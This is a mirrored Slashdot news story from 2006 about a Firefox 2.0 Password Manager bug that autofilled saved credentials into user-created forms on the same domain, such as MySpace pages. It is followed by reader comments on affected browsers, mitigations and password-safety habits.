Slashdot Mirror

← Back to Stories (view on slashdot.org)

Firefox 2.0 Password Manager Bug Exposes Passwords

Posted by ryuzaki0 on from the be-careful-out-there dept.

zbuffered writes, "Today, Mozilla made public bug #360493, which exposes Firefox's Password Manager on many public sites. The flaw derives from Firefox's willingness to supply the username and password stored on one page on a domain to another page on a domain. For example, username/password input tags on a Myspace user's site will be unhelpfully propagated with the visitor's Myspace.com credentials. It was first discovered in the wild by Netcraft on Oct. 27. As this proof-of-concept illustrates, because the username/password fields need not be visible on the page, your password can be stolen in an almost completely transparent fashion. Stopgap solutions include avoiding using Password Manager and the Master Password Timeout Firefox extension, which will at least cause a prompt before the fields are filled. However, in the original case detailed in the bug report, the phish mimicked the login.myspace.com site almost perfectly, causing many users to believe they needed to log in. A description of this new type of attack, dubbed the Reverse Cross-Site Request (RCSR) vulnerability, is available from the bug's original author."

18 of 315 comments (clear)

  1. Not just Firefox 2.0, also IE6/7 and earlier F'fox by Andy_R · · Score: 4, Informative

    According to the Bugzilla link, this bug is also present in pre 2.0 releases of Firefox, and IE 6/7.

    So much for me being smug about going back to Firefox 1.5!

    --
    A pizza of radius z and thickness a has a volume of pi z z a
  2. Dis-satisfied with v2.0 by macdaddy · · Score: 3, Informative
    I don't know about everyone else but I am generally dis-satisfied with v2.0. Frankly I felt that the memory leak in FF was significantly amplified in 2.0. I noticed back on 1.5 that every time I put my laptop into standby with FF running and then woke it up that FF would slowly increase it's memory consumption to about 30% more than what it was before being put into standby. Ie, if it was 100MB when it went to standby it would be around 130MB after waking the laptop, switching focus to FF, and clicking through my opened tabs. In FF 2.0 I have to literally shutdown FF every day or two or FF will easily consume upwards of 500MB of my RAM. I usually have about a dozen windows open and in each window I have 5-15 tabs. That's a fair bit but it didn't cause me much grief in v1.5.

    It also took me a while to figure out how to remove the close button from each tab. The tab scrolling "feature" was also a point of great annoyance that took up more of my time to find a fix.

    In short I'm just not jumping for joy over FF. This new flaw happens to come to light the day after I search Google for a way to manually add userids and passwords to the FF DB (any ideas?). This was to address the problem of FF not picking up some text fields as userid and password fields. One solution I found was RoboForm, though I'm not sure I want to pay for what I think should be a fairly easy thing to do inside FF. FF is getting better but personally I'd rather be using Mozilla 1.7.x.

  3. Re:What an incredible gaffe by Andy_R · · Score: 2, Informative

    Of course it's far less shocking that the same bug is present in IE6 and IE7! I wonder which browser you will be recommending... do you know of one that passes the test-case linked to from the bugzilla page?

    --
    A pizza of radius z and thickness a has a volume of pi z z a
  4. That is Scary by EricJ2190 · · Score: 2, Informative

    That is disturbing to me since I use FF2 to store many of my passwords. However, I don't store passwords for more critical sites, like my bank's website. I recommend others do the same.

  5. Re:I sense a disturbance in the force... by Digitalia · · Score: 2, Informative

    I tried it with both IE6 and IE7 and can confirm that on both of the computers I tried, the proof-of-concept page failed.

    --
    Pax Digitalia
  6. Re:Is it used? by Odiumjunkie · · Score: 4, Informative

    > No biggie, except that the 'reveal all passwords' button exists (and, last I checked, required no authentication to use). Firefox, for as long as I can remember, has allowed you to set a master password, without which the password manager will not populate any password feilds and will not allow the viewing of any stored passwords.

  7. Re:Sounds more like a bug in myspace by Bogtha · · Score: 2, Informative

    Any scammer out there can get a nearly free hosting plan and upload whatever content they want.

    Yes, but that's not a problem because they aren't on a domain where you have a saved password. The problem here is that random people can upload content to, say, myspace.com, and if you have a password for myspace.com, your browser will automatically fill their form in. When an attacker uploads something to attacker.example.com, you aren't going to care because you don't have a saved password for attacker.example.com.

    --
    Bogtha Bogtha Bogtha
  8. WARNING by tezbobobo · · Score: 3, Informative

    DEERPARK 1.5.0.4 is also vulnerable - based on firefox 1.5

  9. Credit card numbers are stored too. by GigsVT · · Score: 2, Informative

    If you have form autocomplete on, credit card numbers are stored in plaintext on your hard disk too. Bug's been open for .. what about 4 years now.

    They refuse to fix it, they say it's not a bug.

    I don't think it's vulnerable to this because it's not fully automatic, however, all someone has to do to get your credit card number is type the first digit and it'll fill in the rest.

    Their advice, "Don't use autocomplete".

    --
    I've had enough abrasive sigs. Kittens are cute and fuzzy.
  10. Alternatives to browser stored passwords by natet · · Score: 3, Informative

    I for one only use the browsers store password feature for the most trivial of sites. For more important sites, I use Password Safe. The program and the database fit easily on a thumb drive, and requires a master password to access. It has a user configurable time out, and a double click on an account copies the data to the clipboard for later use, allowing you to foil keyboard based sniffers.

    --
    IANAL... But I play one on /.
  11. Password safety by Pedrito · · Score: 2, Informative

    I have two types of passwords: The ones for fluff sites, like Slashdot, Wikipedia, hotmail (a.k.a. Spam box), and so forth, which usually get 1 of 2 passwords. Then for banks and credit cards and what have you, I use real passwords with different ones for each site.

    I could care less if someone hacks my Slashdot account or my wikipedia account. The worst thing they can do is vandalize under my name. And as for hotmail, they can have my spam. And were I to have a myspace account, I could care less if someone got that too.

    Fortunately, my bank and credit card companies don't allow others to create their own pages, so I'm not too concerned. I suspect this will get fixed long before it becomes a concern for me.

  12. Re:Why I'm not using FF 2.0 by flyfishertx · · Score: 2, Informative

    Take a look at http://kb.mozillazine.org/Permissions.default.imag e it explains how to set the Permissions.default.image to show only images from the originating site. Personally, I wish they would have left the check box for it in preferences, but editing in about:config is nearly as fast.

  13. Re:I sense a disturbance in the force... by LordEd · · Score: 3, Informative
    Didn't even think of the 'response time' end.

    Please look at the bug report. Submission of testcase file is November 12 (9 days ago)

    From TFA:
    It was first discovered in the wild by Netcraft on Oct. 27 (25 days ago)
    The clock is ticking... will Firefox beat IE's response time?
  14. Re:Opera Vulnerable? by NexusTw1n · · Score: 2, Informative

    Opera has indeed been around longer, and most of the ideas in FF such as tabs and mouse gestures, and wand, were done first in Opera.

    It's why this vulnerability is so stupid, all the FF team had to do was copy the way Opera does it.

    In order to use the password manager, you need to click on the wand, or hit ctrl & enter together.

    The ctrl enter shortcut is a beautiful idea, because after recalling the password, it "clicks" the button that currently has focus, which is usually the "login" button, so most of the time it fetches the password and logs you in automatically after you hit that key combo.

    Nice and simple, but nice and secure because there is no way to trick the user into doing it.

    --
    It has become appallingly obvious that our technology has exceeded our humanity. --Albert Einstein
  15. myspace... by DeadboltX · · Score: 2, Informative

    It is not a bug with firefox, it is a bug with myspace.
    I doubt you will find many places other than myspace where this "bug" will be exploited. Why? Because most sites that host user generated content are responsible enough to remove the users ability to post potentially-malicious markup language on the site. These sites strip almost all (if not all) markup and only allow a small handful of decoration tags like BOLD. (Slashdot is a perfect example of allowed html markup)

    The problem is that the code on myspace is shoddy at best, and the fact that users can put any kind of html on their myspace page was an accidental result of such. Then when users figured out they could customize their page with css and other markup code they were happy, and so myspace left it in.
    Nowadays everyone is so used to myspace letting them customize their page (in a shitty hack sort of way) that if they were to take that aspect away I think myspace would die in a month (I know a lot of girls who only go on myspace so that they can upgrade their page and make it look better by customizing it) so they are not likely to ditch this "feature" of their site.

  16. Re:Not just Firefox 2.0, also IE6/7 and earlier F' by TheNetAvenger · · Score: 2, Informative

    According to the Bugzilla link, this bug is also present in pre 2.0 releases of Firefox, and IE 6/7.


    They say it exists in IE 6/7, so they don't look like the only fool.

    So how do they explain the fact that it really 'doesn't exist' in IE 6/7, and doesn't this make them look even more foolish?

    And no I won't defend IE6 or even IE7. But keep the facts where they are; this is not an IE exploit.

  17. Re:no need to save passwords --generate em on the by caluml · · Score: 2, Informative

    history | less ?

    --
    Get your own free personal location tracker
  18. Re:I sense a disturbance in the force... by zootm · · Score: 3, Informative

    HTML forms work just fine without Javascript. And yes, you're effectively tricked into clicking an action button. If you look at the sample "injected HTML", they make it look like the user is clicking a Flash movie when in fact they're clicking a blank image-type <input> on the page. This submits the GET-style form. So long as the user is "tricked" into clicking something, and forms are allowed, this could steal the password from the password manager.

    The code is available in the text box at the bottom of the this page. Neither Flash nor Javascript is required to trigger the exploit, just a click from a user in a attacker-defined position on the page.